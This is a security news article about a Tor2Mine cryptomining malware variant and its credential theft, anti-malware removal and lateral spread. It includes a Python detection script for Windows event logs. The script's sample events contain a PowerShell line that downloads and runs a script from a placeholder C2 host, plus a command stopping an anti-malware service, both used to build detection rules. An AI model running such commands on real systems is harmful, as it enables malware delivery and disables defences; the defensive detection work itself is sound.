Last Updated on 07/12/2021 by Riya
Cryptocurrencies have grown in prominence among consumers, but with that popularity cryptocurrency mining campaigns have also moved to the forefront of the threat landscape. New TTPs and malware variants appear daily, because crypto mining operations have proven lucrative for attackers.
Sophos has discovered one such variant, and it is more capable and harmful than the original. The new Tor2Mine variant is a Monero miner; the campaign has been active since 2019 and can therefore draw on large networks of compromised worker devices.
Its authors have hardened the miner to evade detection and maintain persistence on compromised networks. Tor2Mine removes anti-malware software, spreads itself to other hosts, and uses a PowerShell script to harvest Windows credentials.
If Tor2Mine obtains administrator privileges, it installs its executables as a service and scans the network for more devices to infect. If the miner cannot obtain a username and password, it can still run its operations as regular tasks without downloading anything further.
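The behaviour chain just described (a remotely fetched PowerShell script, credential access, anti-malware removal, then a service when privileged or a plain task otherwise) can be correlated per host from standard Windows event logs. The following is an added detection example, not code from Sophos or from this article; it runs over constructed event records and assumes the unprivileged fallback surfaces as a scheduled-task creation (event 4698) and that PowerShell script block logging (4104), process creation (4688) and service installation (7045) are being collected.

```python
import re
from collections import defaultdict

# Constructed sample events, not real telemetry. Event IDs are the standard Windows
# ones: 4104 PowerShell script block, 4688 process creation, 7045 service installed,
# 4698 scheduled task created. Hostnames, paths, URLs and service names are placeholders.
SAMPLE_EVENTS = [
    ("ws01", 4104, "ScriptBlock: IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')"),
    ("ws01", 4104, "ScriptBlock: $pw = ...; read credential material from the host"),
    ("ws01", 4688, "Process Command Line: sc.exe stop AvPlaceholderSvc"),
    ("ws01", 7045, "Service Name: UpdSvc  Service File Name: C:\\Users\\Public\\m.exe"),
    ("ws02", 4104, "ScriptBlock: IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')"),
    ("ws02", 4698, "Task Name: \\Updater  Command: C:\\Users\\Public\\m.exe"),
    ("ws03", 7045, "Service Name: VendorAgent  Service File Name: C:\\Program Files\\Vendor\\agent.exe"),
]

# Map an event ID plus a message pattern to one of the behaviour stages described above.
STAGE_RULES = [
    (4104, re.compile(r"DownloadString|Invoke-Expression|\bIEX\b", re.I), "remote_script"),
    (4104, re.compile(r"credential|password", re.I), "cred_access"),
    (4688, re.compile(r"sc(\.exe)?\s+(stop|delete)|taskkill", re.I), "av_tamper"),
    (7045, re.compile(r"."), "persist_service"),   # service install: the privileged path
    (4698, re.compile(r"."), "persist_task"),      # task creation: the unprivileged fallback
]


def stages_of(event_id, message):
    """Return every stage a single event matches (an event may hit several rules)."""
    return {stage for eid, pat, stage in STAGE_RULES if eid == event_id and pat.search(message)}


def correlate(events):
    """Group stages per host and alert on persistence that follows a precursor stage."""
    per_host = defaultdict(set)
    for host, event_id, message in events:
        per_host[host] |= stages_of(event_id, message)
    alerts = {}
    for host, stages in per_host.items():
        persistence = stages & {"persist_service", "persist_task"}
        precursors = stages & {"remote_script", "cred_access", "av_tamper"}
        # A lone service install (ws03) is routine admin activity; only the combination alerts.
        if persistence and precursors:
            alerts[host] = {"privileged_path": "persist_service" in stages, "stages": sorted(stages)}
    return alerts


if __name__ == "__main__":
    for host, info in correlate(SAMPLE_EVENTS).items():
        print(host, info)
```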
Once miners are active on a network, more dangerous threats have an opening to follow. Tor2Mine also appears to be resilient compared with rival miners: once it has established persistence, it can only be removed with endpoint protection and other anti-malware solutions.
Because of its lateral movement capability, Tor2Mine continues to infect systems even if its C2 server goes down. Sophos notes that cryptominers have little chance of infecting businesses that promptly patch flaws in their web-facing systems. Hence, as new risks emerge, businesses must keep pace by adopting effective cybersecurity solutions.